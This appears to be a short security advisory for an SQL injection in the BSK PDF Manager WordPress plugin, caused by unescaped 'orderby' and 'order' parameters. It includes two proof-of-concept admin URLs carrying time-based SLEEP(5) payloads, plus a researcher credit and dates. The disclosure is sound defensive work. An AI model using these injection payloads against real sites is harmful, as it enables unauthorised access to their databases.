The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue
With at least one BSK PDF Category: https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5) https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-11-01 (about 1 years ago)
2021-11-01 (about 1 years ago)
2022-09-26 (about 4 months ago)